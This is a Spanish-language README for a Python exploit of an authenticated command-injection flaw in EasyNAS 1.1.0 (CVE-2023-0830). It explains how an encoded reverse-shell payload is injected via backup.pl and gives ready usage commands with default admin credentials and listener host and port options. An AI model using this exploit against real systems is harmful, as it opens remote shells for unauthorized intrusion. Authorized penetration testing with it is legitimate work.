
Exploit para EasyNAS versión 1.1.0. La vulnerabilidad explotada es una falla de inyección de comandos, que requiere autenticación.
Este script de Python es un exploit potente para EasyNAS versión 1.1.0 con funcionalidad mejorada, incluido un listener integrado. La vulnerabilidad explotada es una falla de inyección de comandos que requiere autenticación.
El script establece una sesión con el servidor objetivo y luego envía una solicitud de inicio de sesión con las credenciales proporcionadas por el usuario. Tras una autenticación exitosa, el script construye un payload que, al ejecutarse, abre una conexión de shell inversa a una IP y un puerto especificados por el usuario. Este payload está codificado en URL y Base64, y luego se inyecta en el archivo backup.pl del servidor mediante una solicitud GET manipulada.
Ivan Spiridonov (xbz0n) https://xbz0n.sh
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444
--mode {shell,reverse} Modo de explotación: shell (shell inversa integrada) o reverse (listener externo)
--lhost IP_ADDRESS Dirección IP para el listener de shell inversa (auto-detectada por defecto)
--lport PORT Puerto para el listener de shell inversa (por defecto: 4444)
--protocol {http,https} Protocolo a usar (por defecto: https)
--verbose Habilitar salida verbosa
--shell {bash,sh,python} Especificar el tipo de shell a usar con el listener integrado (por defecto: bash)
Este script es solo para fines educativos y pruebas de penetración autorizadas. Siempre solicite permiso explícito antes de ejecutar cualquier prueba de penetración contra una red o sistema.
Por favor, úselo de forma responsable.